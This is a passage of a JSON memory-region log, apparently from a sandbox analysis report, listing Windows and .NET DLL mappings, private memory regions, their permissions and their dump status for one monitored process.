"entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_590", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:00.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_591", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:00.271", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_592", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:00.273", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_593", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", 
"region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:00.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_594", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:00.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_595", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:00.274", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_596", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:00.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No 
dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_597", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:00.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_598", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:00.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 8791790452736, "type": "region", "version": 1 }, "end_va": 8791790579711, "entry_point": 8791790477544, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_599", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 8791790452736, "timestamp": "00:01:00.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 897024, "start_va": 8791790583808, 
"type": "region", "version": 1 }, "end_va": 8791791480831, "entry_point": 8791790716768, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_600", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791790583808, "timestamp": "00:01:00.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 421888, "start_va": 8791791566848, "type": "region", "version": 1 }, "end_va": 8791791988735, "entry_point": 8791791611964, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_601", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 8791791566848, "timestamp": "00:01:00.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 8791792025600, "type": "region", "version": 1 }, "end_va": 8791792848895, "entry_point": 8791792527476, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_602", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 8791792025600, "timestamp": "00:01:00.278", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000603-addr_0x0000000000200000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_96", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 
2101247, "entry_point": 0, "filename": null, "id": "region_603", "name": "private_0x0000000000200000", "norm_filename": null, "region_type": "private_memory", "start_va": 2097152, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000604-addr_0x0000000000210000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_97", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2166783, "entry_point": 0, "filename": null, "id": "region_604", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_605", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2322431, "entry_point": 0, "filename": null, "id": "region_606", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": 
"00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2367487, "entry_point": 0, "filename": null, "id": "region_607", "name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000608-addr_0x0000000000430000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_98", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 4390912, "type": "region", "version": 1 }, "end_va": 5439487, "entry_point": 0, "filename": null, "id": "region_608", "name": "private_0x0000000000430000", "norm_filename": null, "region_type": "private_memory", "start_va": 4390912, "timestamp": "00:01:00.361", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000609-addr_0x00000000005e0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_99", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 6225919, "entry_point": 0, "filename": null, "id": "region_609", "name": "private_0x00000000005e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 6160384, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", 
"flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6225920, "type": "region", "version": 1 }, "end_va": 7831551, "entry_point": 0, "filename": null, "id": "region_610", "name": "pagefile_0x00000000005f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6225920, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 9441279, "entry_point": 0, "filename": null, "id": "region_611", "name": "pagefile_0x0000000000780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7864320, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 9502720, "type": "region", "version": 1 }, "end_va": 30474239, "entry_point": 0, "filename": null, "id": "region_612", "name": "pagefile_0x0000000000910000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 9502720, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 30474240, "type": "region", "version": 1 }, "end_va": 33419263, "entry_point": 30474240, "filename": 
"\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_613", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 30474240, "timestamp": "00:01:00.362", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 37564415, "entry_point": 0, "filename": null, "id": "region_614", "name": "pagefile_0x0000000001fe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33423360, "timestamp": "00:01:00.363", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000615-addr_0x000000006fff0000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_100", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 1878982656, "type": "region", "version": 1 }, "end_va": 1879048191, "entry_point": 0, "filename": null, "id": "region_615", "name": "private_0x000000006fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1878982656, "timestamp": "00:01:00.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12288, "start_va": 8791679696896, "type": "region", "version": 1 }, "end_va": 8791679709183, "entry_point": 8791679696896, "filename": "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll", "id": "region_616", "name": 
"api-ms-win-core-synch-l1-2-0.dll", "norm_filename": "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll", "region_type": "memory_mapped_file", "start_va": 8791679696896, "timestamp": "00:01:00.363", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_617", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:00.370", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_618", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 8791788683264, "timestamp": "00:01:00.371", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000619-addr_0x000007fefd9c0000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_101", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791757946880, "type": "region", "version": 1 }, "end_va": 8791758012415, "entry_point": 0, "filename": null, "id": "region_619", "name": 
"private_0x000007fefd9c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791757946880, "timestamp": "00:01:00.381", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000620-addr_0x0000000000380000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_102", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_620", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:00.459", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 3878911, "entry_point": 3735552, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\1033\\cscompui.dll", "id": "region_621", "name": "cscompui.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\1033\\cscompui.dll", "region_type": "memory_mapped_file", "start_va": 3735552, "timestamp": "00:01:00.459", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000622-addr_0x00000000023e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_103", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 37617664, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 0, "filename": null, "id": "region_622", 
"name": "private_0x00000000023e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37617664, "timestamp": "00:01:00.465", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000623-addr_0x00000000025a0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_104", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 39452672, "type": "region", "version": 1 }, "end_va": 39518207, "entry_point": 0, "filename": null, "id": "region_623", "name": "private_0x00000000025a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39452672, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000624-addr_0x00000000025b0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_105", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 40566783, "entry_point": 0, "filename": null, "id": "region_624", "name": "private_0x00000000025b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39518208, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000625-addr_0x0000000002860000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_106", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 42336256, "type": "region", "version": 1 }, "end_va": 42860543, 
"entry_point": 0, "filename": null, "id": "region_625", "name": "private_0x0000000002860000", "norm_filename": null, "region_type": "private_memory", "start_va": 42336256, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_626", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:00.466", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_627", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:00.467", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2428927, "entry_point": 0, "filename": null, "id": "region_628", "name": "pagefile_0x0000000000250000", "norm_filename": null, "region_type": "pagefile_backed_memory", 
"start_va": 2424832, "timestamp": "00:01:00.486", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000629-addr_0x00000000027a0000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_107", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 41549824, "type": "region", "version": 1 }, "end_va": 42074111, "entry_point": 0, "filename": null, "id": "region_629", "name": "private_0x00000000027a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 41549824, "timestamp": "00:01:00.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_630", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:00.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791754276864, "type": "region", "version": 1 }, "end_va": 8791754338303, "entry_point": 8791754280976, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_631", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 
8791754276864, "timestamp": "00:01:00.508", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3543039, "entry_point": 0, "filename": null, "id": "region_632", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:01:00.537", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000633-addr_0x0000000002700000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_108", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 40894464, "type": "region", "version": 1 }, "end_va": 41418751, "entry_point": 0, "filename": null, "id": "region_633", "name": "private_0x0000000002700000", "norm_filename": null, "region_type": "private_memory", "start_va": 40894464, "timestamp": "00:01:00.537", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000634-addr_0x0000000002980000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_109", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 43515904, "type": "region", "version": 1 }, "end_va": 44040191, "entry_point": 0, "filename": null, "id": "region_634", "name": "private_0x0000000002980000", "norm_filename": null, "region_type": "private_memory", "start_va": 43515904, "timestamp": "00:01:00.538", "type": "region", "version": 1 }, { "dump": 
{ "filename": "process_00000002-region_00000635-addr_0x0000000002a00000-size_0x0000000000400000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_110", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4194304, "start_va": 44040192, "type": "region", "version": 1 }, "end_va": 48234495, "entry_point": 0, "filename": null, "id": "region_635", "name": "private_0x0000000002a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 44040192, "timestamp": "00:01:00.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000636-addr_0x0000000002f10000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_111", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 49348608, "type": "region", "version": 1 }, "end_va": 49872895, "entry_point": 0, "filename": null, "id": "region_636", "name": "private_0x0000000002f10000", "norm_filename": null, "region_type": "private_memory", "start_va": 49348608, "timestamp": "00:01:00.538", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000002-region_00000637-addr_0x0000000002f90000-size_0x0000000000200000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_112", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 2097152, "start_va": 49872896, "type": "region", "version": 1 }, "end_va": 51970047, "entry_point": 0, "filename": null, "id": "region_637", "name": "private_0x0000000002f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 49872896, "timestamp": "00:01:00.541", "type": "region", "version": 1 
}, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 24100470784, "type": "region", "version": 1 }, "end_va": 24100614143, "entry_point": 24100470784, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\alink.dll", "id": "region_638", "name": "alink.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\alink.dll", "region_type": "memory_mapped_file", "start_va": 24100470784, "timestamp": "00:01:00.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3608575, "entry_point": 0, "filename": null, "id": "region_639", "name": "pagefile_0x0000000000370000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3604480, "timestamp": "00:01:00.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_640", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:00.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the 
configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 3936255, "entry_point": 0, "filename": null, "id": "region_641", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:00.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_642", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:00.645", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_643", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:00.655", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 3997696, "type": "region", "version": 1 }, "end_va": 4001791, "entry_point": 0, "filename": null, "id": "region_644", "name": 
